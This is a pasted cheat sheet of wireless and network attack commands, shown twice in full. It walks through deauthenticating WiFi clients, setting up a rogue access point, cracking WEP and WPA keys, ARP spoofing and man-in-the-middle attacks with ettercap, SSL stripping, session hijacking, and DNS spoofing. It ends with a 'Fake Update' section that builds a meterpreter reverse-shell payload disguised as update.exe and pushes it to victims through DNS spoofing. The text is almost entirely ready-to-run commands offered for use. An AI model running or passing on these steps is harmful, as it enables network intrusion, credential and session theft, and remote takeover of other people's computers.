· 6 years ago · Aug 10, 2019, 05:36 PM
1> ifconfig wlan0 down
2
3> airmon-ng start wlan0
4
5> airmon-ng stop wlan0
6
7> airmon-ng start mon0
8
9> airodump-ng mon0
10
11*crtl+C
12
13> airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
14ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0
15
16~Deauthenticate all clients in a specific network
17> aireplay-ng --deauth [number-of packets] -a [Access-Point] [interface]
18ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 mon0
19
20~Deauthenticate a specific client in a network
21> aireplay-ng --deauth [number-of packets] -a [Access-Point] -c [target=STATION] [interface]
22ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c AA:BB:CC:DD:EE:FF mon0
23
24######Deauthentication attacks#######
25
26
27> airodump-ng --write [filename] --output-format [file-format] [interface]
28ex: airodump-ng --write file --output-format csv mon0
29
30> airdrop-ng -t [csv-file] -r [rules-file] -i [interfaces]
31ex: airdrop-ng -t file-01.csv -r rules -i mon0
32
33--- Creating Rule-File for Air-drop (Summary) ---
34~ d/[bssid-target]|[Target Device]
35~a/[fake-mac/your-bssid]|[Target Device]
36
37For More Info: [URL]http://www.aircrack-ng.org/doku.php?id=airdrop-ng&DokuWiki=fc8c2e4leoquoc83lj0numire0[/URL]
38
39###### Creating Fake Access Point ######
40
41~Edit dhcp configuration file
42
43> echo -e "interface=at0\ndhcp-range=192.168.0.3,192.168.0.150,12h" > /etc/dnsmasq.conf
44
45~Start Fake AP
46
47> airbase-ng -e [fake network name] -c [channel] [interface]
48ex: airbase-ng -e fake-ap -c 6 mon0
49
50ifconfig at0 192.168.0.1 up
51
52~Removing IPTABLEs rules
53
54> iptables --flush
55> iptables --table nat --flush
56> iptables --delete-chain
57> iptables --tables nat --delete-chain
58
59~Enable Packet forward in iptables
60
61> iptables -P FORWARD ACCEPT
62
63~Link the wifi card and the card thats connected to the internet
64
65> iptables -t nat -A POSTROUTING -o [internet interface] -j MASQUERADE
66ex: iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
67
68~Start dnsmasq
69
70> sudo dnsmasq
71
72~Enable IP forward
73
74> echo "1" > /proc/sys/net/ipv4/ip_forward
75
76###### WEP Cracking Basic ######
77
78> airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
79ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0
80
81> aircrack-ng [file-name]
82ex: aircrack-ng file-01.cap
83
84###### Fake Authentication / Packet Injection ######
85
86> aireplay-ng --fakeauth 0 -a [target MAC] -h [your MAC] [interface]
87ex: aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
88
89--FOLLOWING Technique can be execute, depends on methodology you want :)
90
91~ARP request reply Technique
92
93> aireplay-ng --arpreply -b [target MAC] -h [your MAC] [interface]
94ex: aireplay-ng --arpreplay -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
95
96~Chop Chop Technique
97
98> aireplay-ng --chopchop -b [target MAC] -h [your MAC] [interface]
99ex: aireplay-ng --chopchop -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
100
101> packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [out from last step.xor] -w [output]
102ex: packetforge-ng -0 -a 1:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor -w file
103
104> aireplay-ng -2 -r [out from last step] [interface]
105ex: aireplay-ng -2 -r file mon0
106
107~Fragmentation Technique
108
109 aireplay-ng --fragment -b [target MAC] -h [your MAC] [interface]
110ex: aireplay-ng --fragment -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
111
112> packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [out from last step.xor] -w [output]
113ex: packetforge-ng -0 -a 1:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor -w file
114
115> aireplay-ng -2 -r [out from last step] [interface]
116ex: aireplay-ng -2 -r file mon0
117
118###### WPA Cracking Basic ######
119
120> wash -i mon0
121
122~Reaver
123
124> reaver -b [target bssid] -c [channel] -i [interface]
125ex: reaver -b 11:22:33:44:55:66 -c 6 -i mon0
126
127###### Capturing Handshake #######
128
129> airodump-ng --channel [channel] --bssid [bssid] --write [filename] [inteface]
130ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0
131
132> aireplay-ng --deauth [number of deauth packets] -a [AP] -c [target] [interface]
133ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c AA:BB:CC:DD:EE:FF mon0
134
135###### Creating Wordlist w/ crunch ######
136
137> crunch [min] [max] [characters=lower|upper|numbers|symbols] -t [pattern] -o [filename]
138ex: crunch 6 8 123456!"&$% -t a@@@@b -o wordlist.txt
139
140###### Cracking the Key w/ Handshake file ######
141
142> aircrack-ng [handshake file] -w [wordlist] [interface]
143ex: aircrack-ng file-01.cap -w wordlist.lst mon0
144
145####### Creating a PMK wordlist ######
146
147~Create a database & import wordlist
148
149> airolib-ng [db_name] --import passwd [wordlist]
150ex: airolib-ng db_wordlist --import passwd wordlist.lst
151
152~Import target essid
153
154> airolib-ng [db_name] --import essid [wordlist]
155ex: airolib-ng db_wordlist --import essid wordlist.lst
156
157~Compute PMK for the wordlist
158
159> airolib-ng [db_name] --batch
160ex: airolib-ng db_wordlist --batch
161
162~Cracking the key using PMK DB
163
164> aircrack-ng -r [db_name] [handshake file]
165ex: aircrack-ng -r db_wordlist file-01.cap
166
167###### Crackin .cap file w/ hashcat ######
168
169[URL]https://hashcat.net/cap2hccap/[/URL]
170
171[URL]https://www.blackmoreops.com/2014/03/27/cracking-wpa-wpa2-with-hashcat-kali-linux/[/URL]
172
173++++++++++++++++++++++
174Post Connection Attack
175++++++++++++++++++++++
176
177###### Info Gathering ######
178
179~Netdiscover
180
181> netdiscover -i [interface] -r [range]
182ex: netdiscover -i wlan0 -r 192.168.1.1/24
183
184~Autoscan
185
186[URL]http://downloads.sourceforge.net/project/autoscan/AutoScan/autoscan-network%201.50/AutoScan-Network-Linux-1.50.bin.tar.gz?r=&ts=1475845627&use_mirror=nchc[/URL]
187
188~Nmap/Zenmap
189
190-Ping Scan
191> nmap -sn [IP/IP Range]
192
193-Quick Scan
194> nmap -T4 -F [IP/IP Range]
195
196-Quick Scan Plus
197> nmap -sV -T4 -O -F --version-light [IP/IP Range]
198
199####### MITM ######
200
201~Arpspoof
202
203> arpspoof -i [interface] -t [target ip] [AP IP/ Default Gateway]
204ex: arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1
205
206> arpspoof -i [interface] -t [AP IP/ Default Gateway] [target ip]
207ex: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.12
208
209> echo "1" > /proc/sys/net/ipv4/ip_forward
210
211~Ettercap
212
213> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
214ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
215ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network
216
217> echo "1" > /proc/sys/net/ipv4/ip_forward
218
219--configure ettercap config
220
221> gedit /etc/ettercap/etter.conf #Uncomment Linux::Iptables
222
223###### MITM Bypassing HTTPS/SSL #######
224
225~configure etter.conf
226
227> gedit /etc/ettercap/etter.conf
228
229--change this::
230[privs]
231ec_uid = 65534 # nobody is the default
232ec_gid = 65534 # nobody is the default
233--into this
234[privs]
235ec_uid = 0 # nobody is the default
236ec_gid = 0 # nobody is the default
237
238~iptables
239
240> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
241
242~SSLSTRIP
243
244> sslstrip -p
245
246~Ettercap
247
248> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
249ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
250ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network
251
252
253> echo "1" > /proc/sys/net/ipv4/ip_forward
254
255###### SESSION Hijacking ######
256
257> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
258ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
259ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network
260
261> echo "1" > /proc/sys/net/ipv4/ip_forward
262
263[URL]https://www.cookiecadger.com/files/CookieCadger-1.08.jar[/URL]
264
265> java -jar CookieCadger-1.08.jar
266
267###### DNS Spoofing ######
268
269~configure etter.dns
270
271> gedit /etc/ettercap/etter.dns
272--> *.sitename.com A *your_ip_here
273
274> ettercap -Tq -M arp:remote -P dns_spoof -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
275ex: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 /192.168.1.1/ /192.168.1.12/
276ex2: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 // #target all network
277
278> echo "1" > /proc/sys/net/ipv4/ip_forward
279
280$$$$ ETTERCAP PLUGINS $$$$
281
282[URL]https://linux.die.net/man/8/ettercap_plugins[/URL]
283
284###### Ettercap Filters ######
285
286> echo "kill();drop();" > drop-packets.filter
287
288> etterfilter drop-packets.filter -o drop-packets.ef
289
290> ettercap -Tq -M arp:remote -F drop-packets.ef -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
291ex: ettercap -Tq -M arp:remote -F drop-packets.ef -i wlan0 /192.168.1.1/ /192.168.1.12/
292ex2: ettercap -Tq -M arp:remote -F drop-packets.ef -i wlan0 // #target all network
293
294> echo "1" > /proc/sys/net/ipv4/ip_forward
295
296###### Ettercap GTK/Gui ######
297
298> ettercap -G
299
300###### XPlico #####
301
302> service apache2 start
303
304> service xplico start
305
306[URL]127.0.0.1:9876/[/URL]
307uname | pass :: xplico
308
309> ettercap -Tq -M arp:remote -w [filename] -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
310ex: ettercap -Tq -M arp:remote -w file -i wlan0 /192.168.1.1/ /192.168.1.12/
311ex2: ettercap -Tq -M arp:remote -w file -i wlan0 // #target all network
312
313#### Fake Update ####
314
315~metasploit
316
317> msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=1337 X > update.exe
318
319> msfconsole
320> use exploit/multi/handler
321> set PAYLOAD windows/meterpreter/reverse_tcp
322> set LHOST your_ip
323> set LPORT 1337
324> exploit
325
326~Evilgrade
327
328> evilgrade
329> configure [module]
330> set agent update.exe
331> start
332
333~ DNS Spoof
334
335~configure etter.dns
336
337> gedit /etc/ettercap/etter.dns
338--> *.sitename.com A *your_ip_here
339
340> ettercap -Tq -M arp:remote -P dns_spoof -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
341ex: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 /192.168.1.1/ /192.168.1.12/
342ex2: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 // #target all network
343
344> echo "1" > /proc/sys/net/ipv4/ip_forward
345
346==================================================================
347E N D
348RAW Paste Data
349> ifconfig wlan0 down
350
351> airmon-ng start wlan0
352
353> airmon-ng stop wlan0
354
355> airmon-ng start mon0
356
357> airodump-ng mon0
358
359*crtl+C
360
361> airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
362ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0
363
364~Deauthenticate all clients in a specific network
365> aireplay-ng --deauth [number-of packets] -a [Access-Point] [interface]
366ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 mon0
367
368~Deauthenticate a specific client in a network
369> aireplay-ng --deauth [number-of packets] -a [Access-Point] -c [target=STATION] [interface]
370ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c AA:BB:CC:DD:EE:FF mon0
371
372######Deauthentication attacks#######
373
374
375> airodump-ng --write [filename] --output-format [file-format] [interface]
376ex: airodump-ng --write file --output-format csv mon0
377
378> airdrop-ng -t [csv-file] -r [rules-file] -i [interfaces]
379ex: airdrop-ng -t file-01.csv -r rules -i mon0
380
381--- Creating Rule-File for Air-drop (Summary) ---
382~ d/[bssid-target]|[Target Device]
383~a/[fake-mac/your-bssid]|[Target Device]
384
385For More Info: [URL]http://www.aircrack-ng.org/doku.php?id=airdrop-ng&DokuWiki=fc8c2e4leoquoc83lj0numire0[/URL]
386
387###### Creating Fake Access Point ######
388
389~Edit dhcp configuration file
390
391> echo -e "interface=at0\ndhcp-range=192.168.0.3,192.168.0.150,12h" > /etc/dnsmasq.conf
392
393~Start Fake AP
394
395> airbase-ng -e [fake network name] -c [channel] [interface]
396ex: airbase-ng -e fake-ap -c 6 mon0
397
398ifconfig at0 192.168.0.1 up
399
400~Removing IPTABLEs rules
401
402> iptables --flush
403> iptables --table nat --flush
404> iptables --delete-chain
405> iptables --tables nat --delete-chain
406
407~Enable Packet forward in iptables
408
409> iptables -P FORWARD ACCEPT
410
411~Link the wifi card and the card thats connected to the internet
412
413> iptables -t nat -A POSTROUTING -o [internet interface] -j MASQUERADE
414ex: iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
415
416~Start dnsmasq
417
418> sudo dnsmasq
419
420~Enable IP forward
421
422> echo "1" > /proc/sys/net/ipv4/ip_forward
423
424###### WEP Cracking Basic ######
425
426> airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
427ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0
428
429> aircrack-ng [file-name]
430ex: aircrack-ng file-01.cap
431
432###### Fake Authentication / Packet Injection ######
433
434> aireplay-ng --fakeauth 0 -a [target MAC] -h [your MAC] [interface]
435ex: aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
436
437--FOLLOWING Technique can be execute, depends on methodology you want :)
438
439~ARP request reply Technique
440
441> aireplay-ng --arpreply -b [target MAC] -h [your MAC] [interface]
442ex: aireplay-ng --arpreplay -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
443
444~Chop Chop Technique
445
446> aireplay-ng --chopchop -b [target MAC] -h [your MAC] [interface]
447ex: aireplay-ng --chopchop -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
448
449> packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [out from last step.xor] -w [output]
450ex: packetforge-ng -0 -a 1:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor -w file
451
452> aireplay-ng -2 -r [out from last step] [interface]
453ex: aireplay-ng -2 -r file mon0
454
455~Fragmentation Technique
456
457 aireplay-ng --fragment -b [target MAC] -h [your MAC] [interface]
458ex: aireplay-ng --fragment -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
459
460> packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [out from last step.xor] -w [output]
461ex: packetforge-ng -0 -a 1:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor -w file
462
463> aireplay-ng -2 -r [out from last step] [interface]
464ex: aireplay-ng -2 -r file mon0
465
466###### WPA Cracking Basic ######
467
468> wash -i mon0
469
470~Reaver
471
472> reaver -b [target bssid] -c [channel] -i [interface]
473ex: reaver -b 11:22:33:44:55:66 -c 6 -i mon0
474
475###### Capturing Handshake #######
476
477> airodump-ng --channel [channel] --bssid [bssid] --write [filename] [inteface]
478ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0
479
480> aireplay-ng --deauth [number of deauth packets] -a [AP] -c [target] [interface]
481ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c AA:BB:CC:DD:EE:FF mon0
482
483###### Creating Wordlist w/ crunch ######
484
485> crunch [min] [max] [characters=lower|upper|numbers|symbols] -t [pattern] -o [filename]
486ex: crunch 6 8 123456!"&$% -t a@@@@b -o wordlist.txt
487
488###### Cracking the Key w/ Handshake file ######
489
490> aircrack-ng [handshake file] -w [wordlist] [interface]
491ex: aircrack-ng file-01.cap -w wordlist.lst mon0
492
493####### Creating a PMK wordlist ######
494
495~Create a database & import wordlist
496
497> airolib-ng [db_name] --import passwd [wordlist]
498ex: airolib-ng db_wordlist --import passwd wordlist.lst
499
500~Import target essid
501
502> airolib-ng [db_name] --import essid [wordlist]
503ex: airolib-ng db_wordlist --import essid wordlist.lst
504
505~Compute PMK for the wordlist
506
507> airolib-ng [db_name] --batch
508ex: airolib-ng db_wordlist --batch
509
510~Cracking the key using PMK DB
511
512> aircrack-ng -r [db_name] [handshake file]
513ex: aircrack-ng -r db_wordlist file-01.cap
514
515###### Crackin .cap file w/ hashcat ######
516
517[URL]https://hashcat.net/cap2hccap/[/URL]
518
519[URL]https://www.blackmoreops.com/2014/03/27/cracking-wpa-wpa2-with-hashcat-kali-linux/[/URL]
520
521++++++++++++++++++++++
522Post Connection Attack
523++++++++++++++++++++++
524
525###### Info Gathering ######
526
527~Netdiscover
528
529> netdiscover -i [interface] -r [range]
530ex: netdiscover -i wlan0 -r 192.168.1.1/24
531
532~Autoscan
533
534[URL]http://downloads.sourceforge.net/project/autoscan/AutoScan/autoscan-network%201.50/AutoScan-Network-Linux-1.50.bin.tar.gz?r=&ts=1475845627&use_mirror=nchc[/URL]
535
536~Nmap/Zenmap
537
538-Ping Scan
539> nmap -sn [IP/IP Range]
540
541-Quick Scan
542> nmap -T4 -F [IP/IP Range]
543
544-Quick Scan Plus
545> nmap -sV -T4 -O -F --version-light [IP/IP Range]
546
547####### MITM ######
548
549~Arpspoof
550
551> arpspoof -i [interface] -t [target ip] [AP IP/ Default Gateway]
552ex: arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1
553
554> arpspoof -i [interface] -t [AP IP/ Default Gateway] [target ip]
555ex: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.12
556
557> echo "1" > /proc/sys/net/ipv4/ip_forward
558
559~Ettercap
560
561> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
562ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
563ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network
564
565> echo "1" > /proc/sys/net/ipv4/ip_forward
566
567--configure ettercap config
568
569> gedit /etc/ettercap/etter.conf #Uncomment Linux::Iptables
570
571###### MITM Bypassing HTTPS/SSL #######
572
573~configure etter.conf
574
575> gedit /etc/ettercap/etter.conf
576
577--change this::
578[privs]
579ec_uid = 65534 # nobody is the default
580ec_gid = 65534 # nobody is the default
581--into this
582[privs]
583ec_uid = 0 # nobody is the default
584ec_gid = 0 # nobody is the default
585
586~iptables
587
588> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
589
590~SSLSTRIP
591
592> sslstrip -p
593
594~Ettercap
595
596> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
597ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
598ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network
599
600
601> echo "1" > /proc/sys/net/ipv4/ip_forward
602
603###### SESSION Hijacking ######
604
605> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
606ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
607ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network
608
609> echo "1" > /proc/sys/net/ipv4/ip_forward
610
611[URL]https://www.cookiecadger.com/files/CookieCadger-1.08.jar[/URL]
612
613> java -jar CookieCadger-1.08.jar
614
615###### DNS Spoofing ######
616
617~configure etter.dns
618
619> gedit /etc/ettercap/etter.dns
620--> *.sitename.com A *your_ip_here
621
622> ettercap -Tq -M arp:remote -P dns_spoof -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
623ex: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 /192.168.1.1/ /192.168.1.12/
624ex2: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 // #target all network
625
626> echo "1" > /proc/sys/net/ipv4/ip_forward
627
628$$$$ ETTERCAP PLUGINS $$$$
629
630[URL]https://linux.die.net/man/8/ettercap_plugins[/URL]
631
632###### Ettercap Filters ######
633
634> echo "kill();drop();" > drop-packets.filter
635
636> etterfilter drop-packets.filter -o drop-packets.ef
637
638> ettercap -Tq -M arp:remote -F drop-packets.ef -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
639ex: ettercap -Tq -M arp:remote -F drop-packets.ef -i wlan0 /192.168.1.1/ /192.168.1.12/
640ex2: ettercap -Tq -M arp:remote -F drop-packets.ef -i wlan0 // #target all network
641
642> echo "1" > /proc/sys/net/ipv4/ip_forward
643
644###### Ettercap GTK/Gui ######
645
646> ettercap -G
647
648###### XPlico #####
649
650> service apache2 start
651
652> service xplico start
653
654[URL]127.0.0.1:9876/[/URL]
655uname | pass :: xplico
656
657> ettercap -Tq -M arp:remote -w [filename] -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
658ex: ettercap -Tq -M arp:remote -w file -i wlan0 /192.168.1.1/ /192.168.1.12/
659ex2: ettercap -Tq -M arp:remote -w file -i wlan0 // #target all network
660
661#### Fake Update ####
662
663~metasploit
664
665> msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=1337 X > update.exe
666
667> msfconsole
668> use exploit/multi/handler
669> set PAYLOAD windows/meterpreter/reverse_tcp
670> set LHOST your_ip
671> set LPORT 1337
672> exploit
673
674~Evilgrade
675
676> evilgrade
677> configure [module]
678> set agent update.exe
679> start
680
681~ DNS Spoof
682
683~configure etter.dns
684
685> gedit /etc/ettercap/etter.dns
686--> *.sitename.com A *your_ip_here
687
688> ettercap -Tq -M arp:remote -P dns_spoof -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
689ex: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 /192.168.1.1/ /192.168.1.12/
690ex2: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 // #target all network
691
692> echo "1" > /proc/sys/net/ipv4/ip_forward
693
694==================================================================
695E N D
696
697We use cookies for various purposes including